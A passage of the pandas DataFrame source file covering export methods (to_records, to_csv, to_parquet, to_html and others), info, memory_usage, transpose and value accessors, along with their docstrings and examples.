Convert DataFrame to a NumPy record array.
Index will be put in the 'index' field of the record array if
requested.
Parameters
----------
index : boolean, default True
Include index in resulting record array, stored in 'index' field.
convert_datetime64 : boolean, default True
Whether to convert the index to datetime.datetime if it is a
DatetimeIndex.
Returns
-------
y : numpy.recarray
See Also
--------
DataFrame.from_records: convert structured or record ndarray
to DataFrame.
numpy.recarray: ndarray that allows field access using
attributes, analogous to typed columns in a
spreadsheet.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2], 'B': [0.5, 0.75]},
... index=['a', 'b'])
>>> df
A B
a 1 0.50
b 2 0.75
>>> df.to_records()
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('index', 'O'), ('A', '<i8'), ('B', '<f8')])
The index can be excluded from the record array:
>>> df.to_records(index=False)
rec.array([(1, 0.5 ), (2, 0.75)],
dtype=[('A', '<i8'), ('B', '<f8')])
By default, timestamps are converted to `datetime.datetime`:
>>> df.index = pd.date_range('2018-01-01 09:00', periods=2, freq='min')
>>> df
A B
2018-01-01 09:00:00 1 0.50
2018-01-01 09:01:00 2 0.75
>>> df.to_records()
rec.array([(datetime.datetime(2018, 1, 1, 9, 0), 1, 0.5 ),
(datetime.datetime(2018, 1, 1, 9, 1), 2, 0.75)],
dtype=[('index', 'O'), ('A', '<i8'), ('B', '<f8')])
The timestamp conversion can be disabled so NumPy's datetime64
data type is used instead:
>>> df.to_records(convert_datetime64=False)
rec.array([('2018-01-01T09:00:00.000000000', 1, 0.5 ),
('2018-01-01T09:01:00.000000000', 2, 0.75)],
dtype=[('index', '<M8[ns]'), ('A', '<i8'), ('B', '<f8')])
"""
if index:
if is_datetime64_any_dtype(self.index) and convert_datetime64:
ix_vals = [self.index.to_pydatetime()]
else:
if isinstance(self.index, MultiIndex):
# array of tuples to numpy cols. copy copy copy
ix_vals = lmap(np.array, zip(*self.index.values))
else:
ix_vals = [self.index.values]
arrays = ix_vals + [self[c].get_values() for c in self.columns]
count = 0
index_names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i, n in enumerate(index_names):
if n is None:
index_names[i] = 'level_%d' % count
count += 1
elif index_names[0] is None:
index_names = ['index']
names = (lmap(compat.text_type, index_names) +
lmap(compat.text_type, self.columns))
else:
arrays = [self[c].get_values() for c in self.columns]
names = lmap(compat.text_type, self.columns)
formats = [v.dtype for v in arrays]
return np.rec.fromarrays(
arrays,
dtype={'names': names, 'formats': formats}
)
@classmethod
def from_items(cls, items, columns=None, orient='columns'):
"""Construct a dataframe from a list of tuples
.. deprecated:: 0.23.0
`from_items` is deprecated and will be removed in a future version.
Use :meth:`DataFrame.from_dict(dict(items)) <DataFrame.from_dict>`
instead.
:meth:`DataFrame.from_dict(OrderedDict(items)) <DataFrame.from_dict>`
may be used to preserve the key order.
Convert (key, value) pairs to DataFrame. The keys will be the axis
index (usually the columns, but depends on the specified
orientation). The values should be arrays or Series.
Parameters
----------
items : sequence of (key, value) pairs
Values should be arrays or Series.
columns : sequence of column labels, optional
Must be passed if orient='index'.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the
input correspond to column labels, pass 'columns'
(default). Otherwise if the keys correspond to the index,
pass 'index'.
Returns
-------
frame : DataFrame
"""
warnings.warn("from_items is deprecated. Please use "
"DataFrame.from_dict(dict(items), ...) instead. "
"DataFrame.from_dict(OrderedDict(items)) may be used to "
"preserve the key order.",
FutureWarning, stacklevel=2)
keys, values = lzip(*items)
if orient == 'columns':
if columns is not None:
columns = _ensure_index(columns)
idict = dict(items)
if len(idict) < len(items):
if not columns.equals(_ensure_index(keys)):
raise ValueError('With non-unique item names, passed '
'columns must be identical')
arrays = values
else:
arrays = [idict[k] for k in columns if k in idict]
else:
columns = _ensure_index(keys)
arrays = values
# GH 17312
# Provide more informative error msg when scalar values passed
try:
return cls._from_arrays(arrays, columns, None)
except ValueError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
elif orient == 'index':
if columns is None:
raise TypeError("Must pass columns with orient='index'")
keys = _ensure_index(keys)
# GH 17312
# Provide more informative error msg when scalar values passed
try:
arr = np.array(values, dtype=object).T
data = [lib.maybe_convert_objects(v) for v in arr]
return cls._from_arrays(data, columns, keys)
except TypeError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
else: # pragma: no cover
raise ValueError("'orient' must be either 'columns' or 'index'")
@classmethod
def _from_arrays(cls, arrays, columns, index, dtype=None):
mgr = _arrays_to_mgr(arrays, columns, index, columns, dtype=dtype)
return cls(mgr)
@classmethod
def from_csv(cls, path, header=0, sep=',', index_col=0, parse_dates=True,
encoding=None, tupleize_cols=None,
infer_datetime_format=False):
"""Read CSV file.
.. deprecated:: 0.21.0
Use :func:`pandas.read_csv` instead.
It is preferable to use the more powerful :func:`pandas.read_csv`
for most general purposes, but ``from_csv`` makes for an easy
roundtrip to and from a file (the exact counterpart of
``to_csv``), especially with a DataFrame of time series data.
This method only differs from the preferred :func:`pandas.read_csv`
in some defaults:
- `index_col` is ``0`` instead of ``None`` (take first column as index
by default)
- `parse_dates` is ``True`` instead of ``False`` (try parsing the index
as datetime by default)
So a ``pd.DataFrame.from_csv(path)`` can be replaced by
``pd.read_csv(path, index_col=0, parse_dates=True)``.
Parameters
----------
path : string file path or file handle / StringIO
header : int, default 0
Row to use as header (skip prior rows)
sep : string, default ','
Field delimiter
index_col : int or sequence, default 0
Column to use for index. If a sequence is given, a MultiIndex
is used. Different default from read_table
parse_dates : boolean, default True
Parse dates. Different default from read_table
tupleize_cols : boolean, default False
write multi_index columns as a list of tuples (if True)
or new (expanded format) if False)
infer_datetime_format: boolean, default False
If True and `parse_dates` is True for a column, try to infer the
datetime format based on the first datetime string. If the format
can be inferred, there often will be a large parsing speed-up.
See also
--------
pandas.read_csv
Returns
-------
y : DataFrame
"""
warnings.warn("from_csv is deprecated. Please use read_csv(...) "
"instead. Note that some of the default arguments are "
"different, so please refer to the documentation "
"for from_csv when changing your function calls",
FutureWarning, stacklevel=2)
from pandas.io.parsers import read_table
return read_table(path, header=header, sep=sep,
parse_dates=parse_dates, index_col=index_col,
encoding=encoding, tupleize_cols=tupleize_cols,
infer_datetime_format=infer_datetime_format)
def to_sparse(self, fill_value=None, kind='block'):
"""
Convert to SparseDataFrame
Parameters
----------
fill_value : float, default NaN
kind : {'block', 'integer'}
Returns
-------
y : SparseDataFrame
"""
from pandas.core.sparse.frame import SparseDataFrame
return SparseDataFrame(self._series, index=self.index,
columns=self.columns, default_kind=kind,
default_fill_value=fill_value)
def to_panel(self):
"""
Transform long (stacked) format (DataFrame) into wide (3D, Panel)
format.
.. deprecated:: 0.20.0
Currently the index of the DataFrame must be a 2-level MultiIndex. This
may be generalized later
Returns
-------
panel : Panel
"""
# only support this kind for now
if (not isinstance(self.index, MultiIndex) or # pragma: no cover
len(self.index.levels) != 2):
raise NotImplementedError('Only 2-level MultiIndex are supported.')
if not self.index.is_unique:
raise ValueError("Can't convert non-uniquely indexed "
"DataFrame to Panel")
self._consolidate_inplace()
# minor axis must be sorted
if self.index.lexsort_depth < 2:
selfsorted = self.sort_index(level=0)
else:
selfsorted = self
major_axis, minor_axis = selfsorted.index.levels
major_labels, minor_labels = selfsorted.index.labels
shape = len(major_axis), len(minor_axis)
# preserve names, if any
major_axis = major_axis.copy()
major_axis.name = self.index.names[0]
minor_axis = minor_axis.copy()
minor_axis.name = self.index.names[1]
# create new axes
new_axes = [selfsorted.columns, major_axis, minor_axis]
# create new manager
new_mgr = selfsorted._data.reshape_nd(axes=new_axes,
labels=[major_labels,
minor_labels],
shape=shape,
ref_items=selfsorted.columns)
return self._constructor_expanddim(new_mgr)
def to_csv(self, path_or_buf=None, sep=",", na_rep='', float_format=None,
columns=None, header=True, index=True, index_label=None,
mode='w', encoding=None, compression=None, quoting=None,
quotechar='"', line_terminator='\n', chunksize=None,
tupleize_cols=None, date_format=None, doublequote=True,
escapechar=None, decimal='.'):
r"""Write DataFrame to a comma-separated values (csv) file
Parameters
----------
path_or_buf : string or file handle, default None
File path or object, if None is provided the result is returned as
a string.
sep : character, default ','
Field delimiter for the output file.
na_rep : string, default ''
Missing data representation
float_format : string, default None
Format string for floating point numbers
columns : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R
mode : str
Python write mode, default 'w'
encoding : string, optional
A string representing the encoding to use in the output file,
defaults to 'ascii' on Python 2 and 'utf-8' on Python 3.
compression : string, optional
A string representing the compression to use in the output file.
Allowed values are 'gzip', 'bz2', 'zip', 'xz'. This input is only
used when the first argument is a filename.
line_terminator : string, default ``'\n'``
The newline character or character sequence to use in the output
file
quoting : optional constant from csv module
defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric
quotechar : string (length 1), default '\"'
character used to quote fields
doublequote : boolean, default True
Control quoting of `quotechar` inside a field
escapechar : string (length 1), default None
character used to escape `sep` and `quotechar` when appropriate
chunksize : int or None
rows to write at a time
tupleize_cols : boolean, default False
.. deprecated:: 0.21.0
This argument will be removed and will always write each row
of the multi-index as a separate row in the CSV file.
Write MultiIndex columns as a list of tuples (if True) or in
the new, expanded format, where each MultiIndex column is a row
in the CSV (if False).
date_format : string, default None
Format string for datetime objects
decimal: string, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data
"""
if tupleize_cols is not None:
warnings.warn("The 'tupleize_cols' parameter is deprecated and "
"will be removed in a future version",
FutureWarning, stacklevel=2)
else:
tupleize_cols = False
from pandas.io.formats.csvs import CSVFormatter
formatter = CSVFormatter(self, path_or_buf,
line_terminator=line_terminator, sep=sep,
encoding=encoding,
compression=compression, quoting=quoting,
na_rep=na_rep, float_format=float_format,
cols=columns, header=header, index=index,
index_label=index_label, mode=mode,
chunksize=chunksize, quotechar=quotechar,
tupleize_cols=tupleize_cols,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar, decimal=decimal)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
@Appender(_shared_docs['to_excel'] % _shared_doc_kwargs)
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
float_format=None, columns=None, header=True, index=True,
index_label=None, startrow=0, startcol=0, engine=None,
merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
freeze_panes=None):
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(self, na_rep=na_rep, cols=columns,
header=header,
float_format=float_format, index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep)
formatter.write(excel_writer, sheet_name=sheet_name, startrow=startrow,
startcol=startcol, freeze_panes=freeze_panes,
engine=engine)
def to_stata(self, fname, convert_dates=None, write_index=True,
encoding="latin-1", byteorder=None, time_stamp=None,
data_label=None, variable_labels=None):
"""
A class for writing Stata binary dta files from array-like objects
Parameters
----------
fname : str or buffer
String path of file-like object
convert_dates : dict
Dictionary mapping columns containing datetime types to stata
internal format to use when writing the dates. Options are 'tc',
'td', 'tm', 'tw', 'th', 'tq', 'ty'. Column can be either an integer
or a name. Datetime columns that do not have a conversion type
specified will be converted to 'tc'. Raises NotImplementedError if
a datetime column has timezone information
write_index : bool
Write the index to Stata dataset.
encoding : str
Default is latin-1. Unicode is not supported
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`
time_stamp : datetime
A datetime to use as file creation date. Default is the current
time.
data_label : str
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as
values. Each label must be 80 characters or smaller.
.. versionadded:: 0.19.0
Raises
------
NotImplementedError
* If datetimes contain timezone information
* Column dtype is not representable in Stata
ValueError
* Columns listed in convert_dates are neither datetime64[ns]
or datetime.datetime
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
.. versionadded:: 0.19.0
Examples
--------
>>> data.to_stata('./data_file.dta')
Or with dates
>>> data.to_stata('./date_data_file.dta', {2 : 'tw'})
Alternatively you can create an instance of the StataWriter class
>>> writer = StataWriter('./data_file.dta', data)
>>> writer.write_file()
With dates:
>>> writer = StataWriter('./date_data_file.dta', data, {2 : 'tw'})
>>> writer.write_file()
"""
from pandas.io.stata import StataWriter
writer = StataWriter(fname, self, convert_dates=convert_dates,
encoding=encoding, byteorder=byteorder,
time_stamp=time_stamp, data_label=data_label,
write_index=write_index,
variable_labels=variable_labels)
writer.write_file()
def to_feather(self, fname):
"""
write out the binary feather-format for DataFrames
.. versionadded:: 0.20.0
Parameters
----------
fname : str
string file path
"""
from pandas.io.feather_format import to_feather
to_feather(self, fname)
def to_parquet(self, fname, engine='auto', compression='snappy',
**kwargs):
"""
Write a DataFrame to the binary parquet format.
.. versionadded:: 0.21.0
This function writes the dataframe as a `parquet file
<https://parquet.apache.org/>`_. You can choose different parquet
backends, and have the option of compression. See
:ref:`the user guide <io.parquet>` for more details.
Parameters
----------
fname : str
String file path.
engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
Parquet library to use. If 'auto', then the option
``io.parquet.engine`` is used. The default ``io.parquet.engine``
behavior is to try 'pyarrow', falling back to 'fastparquet' if
'pyarrow' is unavailable.
compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
Name of the compression to use. Use ``None`` for no compression.
**kwargs
Additional arguments passed to the parquet library. See
:ref:`pandas io <io.parquet>` for more details.
See Also
--------
read_parquet : Read a parquet file.
DataFrame.to_csv : Write a csv file.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_hdf : Write to hdf.
Notes
-----
This function requires either the `fastparquet
<https://pypi.python.org/pypi/fastparquet>`_ or `pyarrow
<https://arrow.apache.org/docs/python/>`_ library.
Examples
--------
>>> df = pd.DataFrame(data={'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_parquet('df.parquet.gzip', compression='gzip')
>>> pd.read_parquet('df.parquet.gzip')
col1 col2
0 1 3
1 2 4
"""
from pandas.io.parquet import to_parquet
to_parquet(self, fname, engine,
compression=compression, **kwargs)
@Substitution(header='Write out the column names. If a list of strings '
'is given, it is assumed to be aliases for the '
'column names')
@Appender(fmt.docstring_to_string, indents=1)
def to_string(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None,
line_width=None, max_rows=None, max_cols=None,
show_dimensions=False):
"""
Render a DataFrame to a console-friendly tabular output.
"""
formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
line_width=line_width,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions)
formatter.to_string()
if buf is None:
result = formatter.buf.getvalue()
return result
@Substitution(header='whether to print column labels, default True')
@Appender(fmt.docstring_to_string, indents=1)
def to_html(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None, bold_rows=True,
classes=None, escape=True, max_rows=None, max_cols=None,
show_dimensions=False, notebook=False, decimal='.',
border=None, table_id=None):
"""
Render a DataFrame as an HTML table.
`to_html`-specific options:
bold_rows : boolean, default True
Make the row labels bold in the output
classes : str or list or tuple, default None
CSS class(es) to apply to the resulting html table
escape : boolean, default True
Convert the characters <, >, and & to HTML-safe sequences.
max_rows : int, optional
Maximum number of rows to show before truncating. If None, show
all.
max_cols : int, optional
Maximum number of columns to show before truncating. If None, show
all.
decimal : string, default '.'
Character recognized as decimal separator, e.g. ',' in Europe
.. versionadded:: 0.18.0
border : int
A ``border=border`` attribute is included in the opening
`<table>` tag. Default ``pd.options.html.border``.
.. versionadded:: 0.19.0
table_id : str, optional
A css id is included in the opening `<table>` tag if specified.
.. versionadded:: 0.23.0
"""
if (justify is not None and
justify not in fmt._VALID_JUSTIFY_PARAMETERS):
raise ValueError("Invalid value for justify parameter")
formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
bold_rows=bold_rows, escape=escape,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal, table_id=table_id)
# TODO: a generic formatter wld b in DataFrameFormatter
formatter.to_html(classes=classes, notebook=notebook, border=border)
if buf is None:
return formatter.buf.getvalue()
def info(self, verbose=None, buf=None, max_cols=None, memory_usage=None,
null_counts=None):
"""
Print a concise summary of a DataFrame.
This method prints information about a DataFrame including
the index dtype and column dtypes, non-null values and memory usage.
Parameters
----------
verbose : bool, optional
Whether to print the full summary. By default, the setting in
``pandas.options.display.max_info_columns`` is followed.
buf : writable buffer, defaults to sys.stdout
Where to send the output. By default, the output is printed to
sys.stdout. Pass a writable buffer if you need to further process
the output.
max_cols : int, optional
When to switch from the verbose to the truncated output. If the
DataFrame has more than `max_cols` columns, the truncated output
is used. By default, the setting in
``pandas.options.display.max_info_columns`` is used.
memory_usage : bool, str, optional
Specifies whether total memory usage of the DataFrame
elements (including the index) should be displayed. By default,
this follows the ``pandas.options.display.memory_usage`` setting.
True always show memory usage. False never shows memory usage.
A value of 'deep' is equivalent to "True with deep introspection".
Memory usage is shown in human-readable units (base-2
representation). Without deep introspection a memory estimation is
made based in column dtype and number of rows assuming values
consume the same memory amount for corresponding dtypes. With deep
memory introspection, a real memory usage calculation is performed
at the cost of computational resources.
null_counts : bool, optional
Whether to show the non-null counts. By default, this is shown
only if the frame is smaller than
``pandas.options.display.max_info_rows`` and
``pandas.options.display.max_info_columns``. A value of True always
shows the counts, and False never shows the counts.
Returns
-------
None
This method prints a summary of a DataFrame and returns None.
See Also
--------
DataFrame.describe: Generate descriptive statistics of DataFrame
columns.
DataFrame.memory_usage: Memory usage of DataFrame columns.
Examples
--------
>>> int_values = [1, 2, 3, 4, 5]
>>> text_values = ['alpha', 'beta', 'gamma', 'delta', 'epsilon']
>>> float_values = [0.0, 0.25, 0.5, 0.75, 1.0]
>>> df = pd.DataFrame({"int_col": int_values, "text_col": text_values,
... "float_col": float_values})
>>> df
int_col text_col float_col
0 1 alpha 0.00
1 2 beta 0.25
2 3 gamma 0.50
3 4 delta 0.75
4 5 epsilon 1.00
Prints information of all columns:
>>> df.info(verbose=True)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Data columns (total 3 columns):
int_col 5 non-null int64
text_col 5 non-null object
float_col 5 non-null float64
dtypes: float64(1), int64(1), object(1)
memory usage: 200.0+ bytes
Prints a summary of columns count and its dtypes but not per column
information:
>>> df.info(verbose=False)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Columns: 3 entries, int_col to float_col
dtypes: float64(1), int64(1), object(1)
memory usage: 200.0+ bytes
Pipe output of DataFrame.info to buffer instead of sys.stdout, get
buffer content and writes to a text file:
>>> import io
>>> buffer = io.StringIO()
>>> df.info(buf=buffer)
>>> s = buffer.getvalue()
>>> with open("df_info.txt", "w", encoding="utf-8") as f:
... f.write(s)
260
The `memory_usage` parameter allows deep introspection mode, specially
useful for big DataFrames and fine-tune memory optimization:
>>> random_strings_array = np.random.choice(['a', 'b', 'c'], 10 ** 6)
>>> df = pd.DataFrame({
... 'column_1': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_2': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_3': np.random.choice(['a', 'b', 'c'], 10 ** 6)
... })
>>> df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
column_1 1000000 non-null object
column_2 1000000 non-null object
column_3 1000000 non-null object
dtypes: object(3)
memory usage: 22.9+ MB
>>> df.info(memory_usage='deep')
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
column_1 1000000 non-null object
column_2 1000000 non-null object
column_3 1000000 non-null object
dtypes: object(3)
memory usage: 188.8 MB
"""
if buf is None: # pragma: no cover
buf = sys.stdout
lines = []
lines.append(str(type(self)))
lines.append(self.index._summary())
if len(self.columns) == 0:
lines.append('Empty %s' % type(self).__name__)
fmt.buffer_put_lines(buf, lines)
return
cols = self.columns
# hack
if max_cols is None:
max_cols = get_option('display.max_info_columns',
len(self.columns) + 1)
max_rows = get_option('display.max_info_rows', len(self) + 1)
if null_counts is None:
show_counts = ((len(self.columns) <= max_cols) and
(len(self) < max_rows))
else:
show_counts = null_counts
exceeds_info_cols = len(self.columns) > max_cols
def _verbose_repr():
lines.append('Data columns (total %d columns):' %
len(self.columns))
space = max(len(pprint_thing(k)) for k in self.columns) + 4
counts = None
tmpl = "%s%s"
if show_counts:
counts = self.count()
if len(cols) != len(counts): # pragma: no cover
raise AssertionError('Columns must equal counts (%d != %d)'
% (len(cols), len(counts)))
tmpl = "%s non-null %s"
dtypes = self.dtypes
for i, col in enumerate(self.columns):
dtype = dtypes.iloc[i]
col = pprint_thing(col)
count = ""
if show_counts:
count = counts.iloc[i]
lines.append(_put_str(col, space) + tmpl % (count, dtype))
def _non_verbose_repr():
lines.append(self.columns._summary(name='Columns'))
def _sizeof_fmt(num, size_qualifier):
# returns size in human readable format
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f%s %s" % (num, size_qualifier, x)
num /= 1024.0
return "%3.1f%s %s" % (num, size_qualifier, 'PB')
if verbose:
_verbose_repr()
elif verbose is False: # specifically set to False, not nesc None
_non_verbose_repr()
else:
if exceeds_info_cols:
_non_verbose_repr()
else:
_verbose_repr()
counts = self.get_dtype_counts()
dtypes = ['%s(%d)' % k for k in sorted(compat.iteritems(counts))]
lines.append('dtypes: %s' % ', '.join(dtypes))
if memory_usage is None:
memory_usage = get_option('display.memory_usage')
if memory_usage:
# append memory usage of df to display
size_qualifier = ''
if memory_usage == 'deep':
deep = True
else:
# size_qualifier is just a best effort; not guaranteed to catch
# all cases (e.g., it misses categorical data even with object
# categories)
deep = False
if ('object' in counts or
self.index._is_memory_usage_qualified()):
size_qualifier = '+'
mem_usage = self.memory_usage(index=True, deep=deep).sum()
lines.append("memory usage: %s\n" %
_sizeof_fmt(mem_usage, size_qualifier))
fmt.buffer_put_lines(buf, lines)
def memory_usage(self, index=True, deep=False):
"""
Return the memory usage of each column in bytes.
The memory usage can optionally include the contribution of
the index and elements of `object` dtype.
This value is displayed in `DataFrame.info` by default. This can be
suppressed by setting ``pandas.options.display.memory_usage`` to False.
Parameters
----------
index : bool, default True
Specifies whether to include the memory usage of the DataFrame's
index in returned Series. If ``index=True`` the memory usage of the
index the first item in the output.
deep : bool, default False
If True, introspect the data deeply by interrogating
`object` dtypes for system-level memory consumption, and include
it in the returned values.
Returns
-------
sizes : Series
A Series whose index is the original column names and whose values
is the memory usage of each column in bytes.
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of an
ndarray.
Series.memory_usage : Bytes consumed by a Series.
pandas.Categorical : Memory-efficient array for string values with
many repeated values.
DataFrame.info : Concise summary of a DataFrame.
Examples
--------
>>> dtypes = ['int64', 'float64', 'complex128', 'object', 'bool']
>>> data = dict([(t, np.ones(shape=5000).astype(t))
... for t in dtypes])
>>> df = pd.DataFrame(data)
>>> df.head()
int64 float64 complex128 object bool
0 1 1.0 (1+0j) 1 True
1 1 1.0 (1+0j) 1 True
2 1 1.0 (1+0j) 1 True
3 1 1.0 (1+0j) 1 True
4 1 1.0 (1+0j) 1 True
>>> df.memory_usage()
Index 80
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
>>> df.memory_usage(index=False)
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
The memory footprint of `object` dtype columns is ignored by default:
>>> df.memory_usage(deep=True)
Index 80
int64 40000
float64 40000
complex128 80000
object 160000
bool 5000
dtype: int64
Use a Categorical for efficient storage of an object-dtype column with
many repeated values.
>>> df['object'].astype('category').memory_usage(deep=True)
5168
"""
result = Series([c.memory_usage(index=False, deep=deep)
for col, c in self.iteritems()], index=self.columns)
if index:
result = Series(self.index.memory_usage(deep=deep),
index=['Index']).append(result)
return result
def transpose(self, *args, **kwargs):
"""
Transpose index and columns.
Reflect the DataFrame over its main diagonal by writing rows as columns
and vice-versa. The property :attr:`.T` is an accessor to the method
:meth:`transpose`.
Parameters
----------
copy : bool, default False
If True, the underlying data is copied. Otherwise (default), no
copy is made if possible.
*args, **kwargs
Additional keywords have no effect but might be accepted for
compatibility with numpy.
Returns
-------
DataFrame
The transposed DataFrame.
See Also
--------
numpy.transpose : Permute the dimensions of a given array.
Notes
-----
Transposing a DataFrame with mixed dtypes will result in a homogeneous
DataFrame with the `object` dtype. In such a case, a copy of the data
is always made.
Examples
--------
**Square DataFrame with homogeneous dtype**
>>> d1 = {'col1': [1, 2], 'col2': [3, 4]}
>>> df1 = pd.DataFrame(data=d1)
>>> df1
col1 col2
0 1 3
1 2 4
>>> df1_transposed = df1.T # or df1.transpose()
>>> df1_transposed
0 1
col1 1 2
col2 3 4
When the dtype is homogeneous in the original DataFrame, we get a
transposed DataFrame with the same dtype:
>>> df1.dtypes
col1 int64
col2 int64
dtype: object
>>> df1_transposed.dtypes
0 int64
1 int64
dtype: object
**Non-square DataFrame with mixed dtypes**
>>> d2 = {'name': ['Alice', 'Bob'],
... 'score': [9.5, 8],
... 'employed': [False, True],
... 'kids': [0, 0]}
>>> df2 = pd.DataFrame(data=d2)
>>> df2
name score employed kids
0 Alice 9.5 False 0
1 Bob 8.0 True 0
>>> df2_transposed = df2.T # or df2.transpose()
>>> df2_transposed
0 1
name Alice Bob
score 9.5 8
employed False True
kids 0 0
When the DataFrame has mixed dtypes, we get a transposed DataFrame with
the `object` dtype:
>>> df2.dtypes
name object
score float64
employed bool
kids int64
dtype: object
>>> df2_transposed.dtypes
0 object
1 object
dtype: object
"""
nv.validate_transpose(args, dict())
return super(DataFrame, self).transpose(1, 0, **kwargs)
T = property(transpose)
# ----------------------------------------------------------------------
# Picklability
# legacy pickle formats
def _unpickle_frame_compat(self, state): # pragma: no cover
if len(state) == 2: # pragma: no cover
series, idx = state
columns = sorted(series)
else:
series, cols, idx = state
columns = com._unpickle_array(cols)
index = com._unpickle_array(idx)
self._data = self._init_dict(series, index, columns, None)
def _unpickle_matrix_compat(self, state): # pragma: no cover
# old unpickling
(vals, idx, cols), object_state = state
index = com._unpickle_array(idx)
dm = DataFrame(vals, index=index, columns=com._unpickle_array(cols),
copy=False)
if object_state is not None:
ovals, _, ocols = object_state
objects = DataFrame(ovals, index=index,
columns=com._unpickle_array(ocols), copy=False)
dm = dm.join(objects)
self._data = dm._data
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, index, col, takeable=False):
"""Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Use .at[] or .iat[] accessors instead.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable:
series = self._iget_item_cache(col)
return com._maybe_box_datetimelike(series._values[index])
series = self._get_item_cache(col)
engine = self.index._engine
try:
return engine.get_value(series._values, index)
except (TypeError, ValueError):
# we cannot handle direct indexing
# use positional
col = self.columns.get_loc(col)
index = self.index.get_loc(index)
return self._get_value(index, col, takeable=True)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""Put single value at passed column and index
.. deprecated:: 0.21.0
Use .at[] or .iat[] accessors instead.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Returns
-------
frame : DataFrame
If label pair is contained, will be reference to calling DataFrame,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
try:
if takeable is True:
series = self._iget_item_cache(col)
return series._set_value(index, value, takeable=True)
series = self._get_item_cache(col)
engine = self.index._engine
engine.set_value(series._values, index, value)
return self
except (KeyError, TypeError):
# set using a non-recursive method & reset the cache
self.loc[index, col] = value
self._item_cache.pop(col, None)
return self
_set_value.__doc__ = set_value.__doc__
def _ixs(self, i, axis=0):
"""
i : int, slice, or sequence of integers
axis : int
"""
# irow
if axis == 0:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
if isinstance(i, slice):
return self[i]
else:
label = self.index[i]
if isinstance(label, Index):
# a location index by definition
result = self.take(i, axis=axis)
copy = True
else:
new_values = self._data.fast_xs(i)
if is_scalar(new_values):
return new_values
# if we are a copy, mark as such
copy = (isinstance(new_values, np.ndarray) and
new_values.base is None)
result = self._constructor_sliced(new_values,
index=self.columns,
name=self.index[i],
dtype=new_values.dtype)
result._set_is_copy(self, copy=copy)
return result
# icol
else:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
label = self.columns[i]
if isinstance(i, slice):
# need to return view
lab_slice = slice(label[0], label[-1])
return self.loc[:, lab_slice]
else:
if isinstance(label, Index):
return self._take(i, axis=1, convert=True)
index_len = len(self.index)
# if the values returned are not the same length
# as the index (iow a not found value), iget returns
# a 0-len ndarray. This is effectively catching
# a numpy error (as numpy should really raise)
